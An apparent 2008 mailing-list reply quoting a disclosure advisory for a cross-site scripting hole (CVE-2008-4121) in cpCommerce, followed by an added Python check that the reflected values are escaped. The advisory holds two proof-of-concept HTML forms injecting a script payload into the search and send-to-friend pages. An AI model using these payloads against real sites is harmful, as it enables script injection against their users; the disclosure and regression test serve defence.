Date: Mon, 20 Oct 2008 10:31:45 -0500
From: rholgstad <rholgstad@...il.com>
To: Fabian Fingerle <fabian@...ensalat.eu>
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Re: Cross Site Scripting (XSS) Vulnerability in cpcommerce, CVE-2008-4121

No one cares about cross site scripting

Fabian Fingerle wrote:
> Cross Site Scripting (XSS) Vulnerability in cpcommerce,
> CVE-2008-4121
>
> References
>
> http://www.datensalat.eu/~fabian/cve/CVE-2008-4121-cpcommerce.html
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4121
> http://cpcommerce.cpradio.org/
>
> Description
>
> cpCommerce is an open-source e-commerce solution that is maintained by
> templates and modules.
>
> Example
>
> Assuming cpcommerce is installed on http://localhost/cpcommerce/,
> anybody could inject JavaScript:
>
> <form method="post" action="http://localhost/cpcommerce/search.php">
> <input type="hidden" name="action" value="search.quick">
> <input type="text" name="search" value='"><script>alert(1)</script>'>
> <input type=submit></form>
>
> <form method="post" action="http://localhost/cpcommerce/sendtofriend.php">
> <input type="hidden" name="action" value="sendtofriend">
> <input type="text" name="name" value='"><script>alert(1)</script>'>
> <input type=submit></form>
>
> Disclosure Timeline
>
> 2008-09-23 Vendor contacted
> 2008-09-23 Vendor released 1.2.4
> 2008-10-19 Published advisory
>
> CVE Information
>
> The Common Vulnerabilities and Exposures (CVE) project has assigned the
> name CVE-2008-4121 to this issue. This is a candidate for inclusion in
> the CVE list (http://cve.mitre.org/), which standardizes names for
> security problems.
>
> Credits and copyright
>
> This vulnerability was discovered by Fabian Fingerle (published with
> help from Hanno Boeck [0]). It's licensed under the creative commons
> attribution license.
>
> Fabian Fingerle, 2008-09-04, http://www.fabian-fingerle.de
>
> [0] http://www.hboeck.de
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
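
A regression check for the values reflected by the two forms in the quoted advisory, as an added example that is not part of either message or of cpCommerce's code. `render_unsafe` and `render_escaped` are hypothetical stand-ins for the application's template, which the page does not show; the check parses the rendered markup and confirms the submitted value comes back as attribute data only.

```python
import html
from html.parser import HTMLParser

# Payload copied from the advisory's two forms.
PAYLOAD = '"><script>alert(1)</script>'

def render_unsafe(field, value):
    # Hypothetical template that echoes the submitted value unescaped.
    return '<input type="text" name="%s" value="%s">' % (field, value)

def render_escaped(field, value):
    # html.escape(quote=True) encodes & < > " ' so the value can neither
    # close the attribute nor open a new tag.
    return '<input type="text" name="%s" value="%s">' % (
        html.escape(field, quote=True), html.escape(value, quote=True))

class _Audit(HTMLParser):
    """Records every start tag and the value attribute of <input> elements."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []
        self.input_values = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_values.append(dict(attrs).get("value"))

def audit(markup):
    parser = _Audit()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.input_values

def reflects_safely(render, field, value):
    """True when the output holds one <input> whose value round-trips intact."""
    tags, values = audit(render(field, value))
    return tags == ["input"] and values == [value]

if __name__ == "__main__":
    for field in ("search", "name"):  # parameters named in the advisory
        print(field,
              "unsafe:", reflects_safely(render_unsafe, field, PAYLOAD),
              "escaped:", reflects_safely(render_escaped, field, PAYLOAD))
```

Comparing the parsed value against the submitted one also catches double-encoding, where an escaped value would display with literal entities.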